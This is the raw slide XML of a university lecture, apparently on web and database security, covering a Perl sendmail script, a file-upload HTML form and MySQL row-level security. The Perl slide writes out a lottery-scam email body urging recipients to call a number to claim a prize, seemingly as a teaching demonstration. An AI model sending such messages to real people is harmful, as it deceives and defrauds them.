                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>\@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>udel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>.edu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>\n";</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>print SENDMAIL "Subject: you just won a lottery \n\n";</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>print SENDMAIL "\n\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>nYes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>, you have won loads of money.\n\n";</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>print SENDMAIL "\n\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>nYou</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> can now have fun the rest of your life.\n\n";</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>print SENDMAIL "\n\n Call immediately at 123-456-789 to claim your prize.\n\n"; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="12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print </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>SENDMAIL "\n\n"; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="12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close </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>SENDMAIL;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397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Uploaded Web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Uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>form&gt;..&lt;/form&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>uploading a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>file (web page) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>by the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>element        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;input type="file" name="file" id="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>file”/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;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dirty="0" smtClean="0"/>
              <a:t>This element </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>causes the form to display </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Browse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>” button that the user can use to locate the file that he/she wants to upload to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>server </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Page calls </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>uploadfile.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> for the “Submit” action on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>form</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>his </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>” file at the web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>contains PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Upload page: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>UploadYourWebPage.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1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>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>form </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>action="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>uploadfile.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>method="post" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>enctype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>="multipart/form-data"&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="14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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>center&gt;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&lt;table border=1 width="600"&gt;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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;&lt;td align="center"&gt;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&lt;label for="file"&gt;Filename for your web page:&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>nbsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>nbsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>nbsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>;&lt;/label&gt; &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> type="file" name="file" id="file" /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;      // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>“Browse” button</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/td&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>tr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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;&lt;td align="center"&gt;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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> type="submit" name="submit" value="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>" /&gt;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&lt;/td&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>tr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&lt;/table&gt;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&lt;/center&gt;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&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>form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  <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1400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800" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New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383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Upload Page</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="pag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81200"/>
            <a:ext cx="8243455" cy="106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85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MySQL with Row-Level Security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MySQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>database with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>row</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>-level security serving as a backend to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Apache </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>web server </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>a user is only allowed to access (and, possibly, modify) certain designated </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>rows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> of a database table </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" smtClean="0"/>
              <a:t>.g.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>, customer account </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>information in a bank </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>is stored </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>in one or more database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
              <a:t>tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>. When </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>a client logs in remotely to see his/her bank balance, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>bank restricts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>customer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>to just those rows of the table that contain information specific to that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>customer’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>account at the bank </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Example MySQL setup</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>ser: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Manager </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>name:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Manager_db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</a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>table </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>name: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Maintenance_Schedule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2000" dirty="0" smtClean="0"/>
              <a:t>Example table</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>---------------+---------------+------------+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| </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>operator_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> | equipment     | deadline   |</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>---------------+---------------+------------+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| Operator1     | Engine parts  | 2014-11-16 |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| Operator2     | Transmission  | 2014-11-10 |</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>+---------------+---------------+------------+</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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287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MySQL with Row-Level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Three accounts: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>operator1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>operator2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>operator3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>When any of these three individuals accesses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Manager_db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>database, especially its </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Maintenance_Schedule</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> table, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>each </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>operator </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>able to view only his/her </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>own</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> row and no other rows </a:t>
            </a:r>
          </a:p>
          <a:p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96630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Installation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sz="2000" dirty="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>erver executable: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>mysqld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dirty="0" smtClean="0"/>
              <a:t>Command-line shell executable: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
